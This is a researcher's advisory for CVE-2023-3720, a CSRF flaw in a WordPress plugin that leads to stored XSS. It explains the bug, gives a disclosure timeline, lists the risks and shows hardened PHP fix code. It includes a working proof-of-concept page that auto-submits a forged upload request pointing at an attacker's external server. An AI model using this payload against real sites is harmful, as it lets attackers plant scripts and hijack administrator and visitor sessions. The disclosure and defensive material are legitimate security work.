
CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

During a security assessment of the Upload Media By URL plugin for WordPress, a medium-severity vulnerability was uncovered in versions prior to 1.0.8. If exploited, it allows an attacker to make a logged-in administrator's browser upload attacker-chosen files, including HTML containing malicious JavaScript, to the WordPress site, exposing the site's users to harmful scripts. Sites running an affected version should update without delay.

Main info:

CVE: CVE-2023-3720
Plugin: Upload Media By URL
Severity: Medium
Publicly Published: August 2, 2023
Last Updated: August 2, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A2: Broken Authentication and Session Management
PoC: Yes
Exploit: Will be published later
References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720
https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954
Plugin Security Certification by CleanTalk

Timeline

July 10, 2023: Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed
July 10, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 17, 2023: The author has eliminated the vulnerability and patched his plugin
August 2, 2023: Registered CVE-2023-3720

Discovery of the Vulnerability

During a security assessment of the Upload Media By URL plugin for WordPress, a medium-severity vulnerability was identified in versions prior to 1.0.8. The plugin performed no Cross-Site Request Forgery (CSRF) check on the request that handles upload-by-URL, so an attacker could trick a logged-in administrator (who holds the unfiltered_html capability) into uploading files on their behalf, including HTML files containing malicious JavaScript. Because the uploaded file is then served from the site's own origin, the script runs in the browser of anyone who opens it, which makes this a Stored XSS issue reachable through CSRF.

Understanding Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. It works because the browser automatically attaches the victim's session cookies to a request even when that request was initiated by a page on another site; the application can only tell the two apart if it demands a secret the attacker's page cannot know, such as a WordPress nonce. The Upload Media By URL plugin accepted the upload-by-URL request without any such token, so an attacker can host a crafted HTML page on an external server that submits that request. If a privileged user, such as an administrator, opens the attacker's page while logged in to WordPress, the page triggers the upload of attacker-chosen files onto the WordPress site.

Exploiting the Cross-Site Request Forgery (CSRF) vulnerability

By crafting a malicious HTML page that carries a CSRF payload, an attacker entices an administrator with upload privileges to visit the external link. The page auto-submits a POST to wp-admin/upload.php whose multiurl parameter points at a file on the attacker's server; the browser attaches the administrator's session cookie, and because the plugin does not check a nonce, it fetches that file and stores it in the media library as if the administrator had asked for it. One practical caveat: browsers that default cookies to SameSite=Lax do not send the WordPress auth cookie on a cross-site POST from an unrelated page (Chrome's exception applies only to cookies set within the previous two minutes), so the attack is most reliable when the cookies carry an explicit SameSite=None, when the victim's browser lacks the Lax default, or when the attacker's page is reachable from the same site.

POC code:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your_site/wordpress/wp-admin/upload.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="multiurl" value="http://your_external_server/123.html" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Potential Risks and Real-World Impact

The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:

  1. Stored Cross-Site Scripting (XSS) Attacks:
    Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users who open the affected files, and potentially exposing sensitive data or credentials. In most cases Stored XSS is used to hijack the victim's session or to act in the victim's browser with their privileges, leading to account takeover.
  2. Malware Distribution:
    Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website.
  3. Unauthorized Content Injection:
    Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site's reputation, or defacing it with inappropriate or harmful materials.
  4. Social Engineering Exploits:
    Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability, update the Upload Media By URL plugin to version 1.0.8 or later, in which the author has added the missing CSRF check.

By addressing the CSRF vulnerability in the Upload Media By URL plugin, website owners can significantly reduce the likelihood of security breaches, protect their site's integrity, and safeguard against social engineering exploits.
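For plugin authors, the shape of the defect and of its fix is worth seeing in code. The block below is an added example written for this page; it is not the plugin's source and not the author's actual 1.0.8 patch, and the umbu_* function and nonce action names are hypothetical. It shows a minimal upload-by-URL handler first in the vulnerable form (any POST carrying multiurl is honoured if the browser sends an admin cookie) and then in a hardened form that checks capability, verifies a WordPress nonce, validates the URL, and rejects file types the site does not allow before anything is fetched. All WordPress functions used are core API.

```php
<?php
// Added example (not the plugin's code): upload-by-URL handler, vulnerable vs. hardened.
// Names prefixed umbu_ and the nonce action 'umbu_upload_by_url' are hypothetical.

// --- Vulnerable pattern: no proof that the request came from the plugin's own form. ---
function umbu_handle_upload_vulnerable() {
    if ( empty( $_POST['multiurl'] ) ) {
        return;
    }
    foreach ( explode( "\n", wp_unslash( $_POST['multiurl'] ) ) as $url ) {
        umbu_sideload( trim( $url ) ); // a cross-site form can reach this with the admin's cookie
    }
}

// --- Hardened pattern ---
function umbu_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'upload.php' ) ) . '">';
    wp_nonce_field( 'umbu_upload_by_url', 'umbu_nonce' ); // secret tied to this user's session
    echo '<textarea name="multiurl"></textarea>';
    submit_button( 'Upload' );
    echo '</form>';
}

function umbu_handle_upload_hardened() {
    if ( empty( $_POST['multiurl'] ) ) {
        return;
    }
    // 1. Capability: only users allowed to add media may get this far.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    // 2. CSRF: dies unless a valid nonce for this action was submitted with the form.
    check_admin_referer( 'umbu_upload_by_url', 'umbu_nonce' );

    foreach ( explode( "\n", wp_unslash( $_POST['multiurl'] ) ) as $url ) {
        $url = trim( $url );
        // 3. Only http(s) URLs to public hosts (rejects file://, localhost, private ranges).
        if ( '' === $url || ! wp_http_validate_url( $url ) ) {
            continue;
        }
        // 4. Decide by extension, before downloading, whether this site allows the type.
        //    wp_check_filetype() returns ext=false for .html, .svg, .php etc. unless allowed.
        $name = wp_basename( (string) wp_parse_url( $url, PHP_URL_PATH ) );
        $type = wp_check_filetype( $name );
        if ( empty( $type['ext'] ) ) {
            continue;
        }
        umbu_sideload( $url );
    }
}

// Shared helper: download the URL to a temp file and insert it into the media library.
// media_handle_sideload() re-checks the file type server-side, so step 4 is defence in depth.
function umbu_sideload( $url ) {
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';

    $tmp = download_url( $url );
    if ( is_wp_error( $tmp ) ) {
        return $tmp;
    }
    $file = array(
        'name'     => wp_basename( (string) wp_parse_url( $url, PHP_URL_PATH ) ),
        'tmp_name' => $tmp,
    );
    $id = media_handle_sideload( $file, 0 );
    if ( is_wp_error( $id ) ) {
        @unlink( $tmp );
    }
    return $id;
}

add_action( 'admin_init', 'umbu_handle_upload_hardened' );
```

The nonce is what defeats the PoC above: the attacker's page cannot read wp_nonce_field()'s output from the admin screen, so check_admin_referer() fails and the request dies before any fetch. The URL and file-type checks address the two follow-on problems the same feature invites, server-side request forgery through the fetch and active content landing in the media library.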


Dmitrii i.
